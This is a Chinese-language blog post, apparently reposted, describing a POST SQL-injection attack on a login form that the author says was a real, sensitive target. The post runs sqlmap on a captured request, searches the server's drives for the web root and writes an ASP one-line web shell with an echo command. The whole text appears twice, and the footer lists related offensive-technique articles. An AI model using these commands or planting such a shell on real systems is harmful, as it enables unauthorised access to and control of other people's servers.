post注入及提权思路
2016-01-23 17:47
267 查看
我们这次的目标有点敏感 性感的马赛克是必须有的
登陆表单
那么我们来看看是不是存在post注入
Setp1:设置代理
Step2:账户admin密码随意 提交上去 抓个包
把抓到的包复制到本地的一个文本里
Sqlmap走起
Sqlmap -r "/tmp/binghe" --batch
很幸运的
后来知道是内网,想连上服务器得拿到shell转发啊
怎么拿 先来列磁盘
dir c:\ ok
Dir d:\ ok
Dir e:\ 没有
.....
用dir 列了C和D盘都没有列到类似的web目录
后来逐个目录列了半个多小时无果
操蛋 喝了杯82年的乐事休息下
Duang 的一下 有了!
在C、D 磁盘搜索
但是搜索什么?
嗯 我在那个登陆页面查看源码找到了一个js文件 访问确实存在
名为jquery.history.js
执行dir/s/b c:\jquery.history.js 在C盘内搜索名为jquery.history.js的文件并返回其路径
但是童话里都是骗人的。。。
说明这台机器上并不存在本文件
这说明了什么?
站
库
分
离
!
今天遇到两次??Real is fuck the dog! 真是日了狗了
这里权且不说,我们讲的是个思路 我们来本地模拟一下
获得网站根目录
c:\binghesec\web\
然后
echo "<%eval request("pass")%>">c:\binghesec\web\binghesec.asp
你是不是想问一句话两边带个双引号会影响执行吗? 你试试不就知道了!!!
有大牛说,找不到根目录没关系,咱可以cmd下建虚拟目录嘛。。。目录你妹啊,你看哪个方便!但是思路确实是可行的,就是麻烦了点。
登陆表单
那么我们来看看是不是存在post注入
Setp1:设置代理
Step2:账户admin密码随意 提交上去 抓个包
把抓到的包复制到本地的一个文本里
Sqlmap走起
Sqlmap -r "/tmp/binghe" --batch
很幸运的
后来知道是内网,想连上服务器得拿到shell转发啊
怎么拿 先来列磁盘
dir c:\ ok
Dir d:\ ok
Dir e:\ 没有
.....
用dir 列了C和D盘都没有列到类似的web目录
后来逐个目录列了半个多小时无果
操蛋 喝了杯82年的乐事休息下
Duang 的一下 有了!
在C、D 磁盘搜索
但是搜索什么?
嗯 我在那个登陆页面查看源码找到了一个js文件 访问确实存在
名为jquery.history.js
执行dir/s/b c:\jquery.history.js 在C盘内搜索名为jquery.history.js的文件并返回其路径
但是童话里都是骗人的。。。
说明这台机器上并不存在本文件
这说明了什么?
站
库
分
离
!
今天遇到两次??Real is fuck the dog! 真是日了狗了
这里权且不说,我们讲的是个思路 我们来本地模拟一下
获得网站根目录
c:\binghesec\web\
然后
echo "<%eval request("pass")%>">c:\binghesec\web\binghesec.asp
你是不是想问一句话两边带个双引号会影响执行吗? 你试试不就知道了!!!
有大牛说,找不到根目录没关系,咱可以cmd下建虚拟目录嘛。。。目录你妹啊,你看哪个方便!但是思路确实是可行的,就是麻烦了点。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- MySQL提权之user.MYD中hash破解方法
- 导出当前域内所有用户hash的技术整理
- 在远程系统上执行程序的技术整理
- 内网渗透中的mimikatz
- Linux下中间人攻击利用框架bettercap测试
- Metasploit渗透技巧:后渗透Meterpreter代理
- 第17章 标准库特殊设施
- linux服务器安全配置10大技巧
- win环境下使用sqlmap写shell + MYSQL提权(默认就是system权限)
- nmap速查表v1.0(中文版)
- WebDAV漏洞直接远程溢出拿下服务器
- [TOP10]最受欢迎的10个Metasploit模块和插件
- DIY简单功能的torrentkitty种子爬虫
- XSS获取cookie并利用
- 使用UEFI+GPT模式安装Windows
- Fiddler 教程
- 一次xss的黑盒挖掘和利用过程
- Android App 注射&&Drozer Use
- php截取后台登陆密码的代码
- 通用型正方教务(通杀各版本)存在注入(不需登陆)+获得webshell+提权内网漫游